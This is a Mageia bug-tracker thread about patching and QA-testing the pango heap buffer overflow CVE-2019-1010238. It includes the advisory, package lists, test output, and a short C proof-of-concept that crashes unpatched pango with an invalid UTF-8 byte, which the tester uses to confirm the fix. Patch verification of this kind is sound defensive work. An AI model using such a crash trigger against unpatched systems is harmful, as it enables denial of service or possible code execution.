Ubuntu and Debian have issued advisories on July 31 and August 11: https://usn.ubuntu.com/4081-1/ https://www.debian.org/security/2019/dsa-4496
Assigning to all packagers collectively, since there is no registered maintainer for this package.
Assignee: bugsquad => pkg-bugsCC: (none) => marja11
Patched package uploaded for Mageia 7. Advisory: ======================== Updated pango package fixes security vulnerability: It was discovered that pango was subject to a heap based buffer overflow vulnerability which could be used to get code execution (CVE-2019-1010238). References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010238 https://usn.ubuntu.com/4081-1/ https://www.debian.org/security/2019/dsa-4496 ======================== Updated packages in core/updates_testing: ======================== lib64pango1.0_0-1.43.0-3.1.mga7 lib64pango1.0-devel-1.43.0-3.1.mga7 lib64pango-gir1.0-1.43.0-3.1.mga7 pango-1.43.0-3.1.mga7 pango-tests-1.43.0-3.1.mga7 pango-doc-1.43.0-3.1.mga7.noarch.rpm from pango-1.43.0-3.1.mga7.src.rpm
CC: (none) => mramboAssignee: pkg-bugs => qa-bugs
mga7, x86-64 Familiarization before updating. Installed pango-tests then searched for test files. The executables reside in /usr/libexec/installed-tests/pango. ./<whatever> --help shows the options, which apply to all the executables. $ ./<executable> -l shows which test is run. I would recommend $ ./<executable> --verbose e.g. $ ./testcolor --verbose GTest: random seed: R02Sf3c982ab8aea203daeb7754509818f16 GTest: run: /color/parse GTest: result: OK Updated the packages. $ cd /usr/libexec/installed-tests/pango $ ./markup-parse --verbose GTest: random seed: R02Sdc459ea2857fcd9d88449ce7201a19e3 GTest: run: /markup/parse/fail-4.markup (MSG: GLib-DEBUG: posix_spawn avoided (fd close requested) ) GTest: result: OK GTest: run: /markup/parse/valid-5.markup (MSG: GLib-DEBUG: posix_spawn avoided (fd close requested) ) GTest: result: OK [...] $ ./testboundaries --verbose GTest: random seed: R02S823a12ab981c82b452a85b5407c07e64 GTest: run: /text/boundaries sample file: ./boundaries.utf8 testboundaries passed GTest: result: OK $ ./test-pangocairo-threads --verbose Assuming that one is OK. $ ./testboundaries_ucd --verbose GTest: random seed: R02Sc74c3ab81d2f2d3727142f17eece4a34 GTest: run: /text/break/grapheme Testing ./GraphemeBreakTest.txt. GTest: result: OK [...] All other breaktests were skipped because there were no other test text files. Assuming that last one is OK. Ran several other tests - all OK. Assigning a 64bit OK.
CC: (none) => tarazed25Whiteboard: (none) => MGA7-64-OK
Rider to comment 3: Forgot to look for POC before the update. CVE-2019-1010238 https://gitlab.gnome.org/GNOME/pango/issues/342 This snippet is supposed to crash before the update: #include <pango/pango.h> #include <pango/pango-bidi-type.h> int main() { PangoDirection dir = PANGO_DIRECTION_LTR; char* inp = "\xf8"; printf("utf8 len %lu\n", g_utf8_strlen(inp, strlen(inp))); pango_log2vis_get_embedding_levels(inp, strlen(inp), &dir); return 0; } Could not figure out how to access all the include files. e.g. $ gcc -lpango1 -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/include/glib-2.0/include -I/usr/include/glib-2.0/glib -o pangotest pangotest.c In file included from /usr/include/glib-2.0/glib/galloca.h:32, from /usr/include/glib-2.0/glib.h:30, from /usr/include/pango-1.0/pango/pango-coverage.h:25, from /usr/include/pango-1.0/pango/pango-font.h:25, from /usr/include/pango-1.0/pango/pango-attributes.h:25, from /usr/include/pango-1.0/pango/pango.h:25, from pangotest.c:1: /usr/include/glib-2.0/glib/gtypes.h:32:10: fatal error: glibconfig.h: No such file or directory #include <glibconfig.h> ^~~~~~~~~~~~~~ compilation terminated. $ locate glibconfig /usr/lib64/glib-2.0/include/glibconfig.h There must be a more concise way of defining all the include paths, some kind of macro perhaps?
Maybe install the -devel package and use pkg-config --cflags pango and pkg-config --libs pango to get the compiler flags.
In reply to comment 5: Thanks David. Yes I installed the devel package as part of the update. Not familiar with exact procedure for pkg-config. Is it something like `pkgconfig --cflags pango` in the compiler command? Or $(pkgconfig --cflags ....)? I'll experiment.
Tried the cli and the best course seems to be to copy and paste the result into the compiler command.
Yep, that worked fine. $ gcc -lpango-1.0 -lgobject-2.0 -lglib-2.0 -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib64/glib-2.0/include -I/usr/include/fribidi -I/usr/include/harfbuzz -I/usr/include/freetype2 -I/usr/include/libpng16 -I/usr/include/uuid -I/usr/include/libxml2 -I/usr/include/cairo -I/usr/include/pixman-1 -I/usr/include/libdrm -o pangotest pangotest.c $ ./pangotest utf8 len 0 So no crash after the update.
$ gcc $(pkg-config --cflags pango) $(pkg-config --libs pango) -o test pangotest.c also works.
Keywords: (none) => advisory, validated_updateCC: (none) => tmb, sysadmin-bugs
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2019-0235.html
Resolution: (none) => FIXEDStatus: NEW => RESOLVED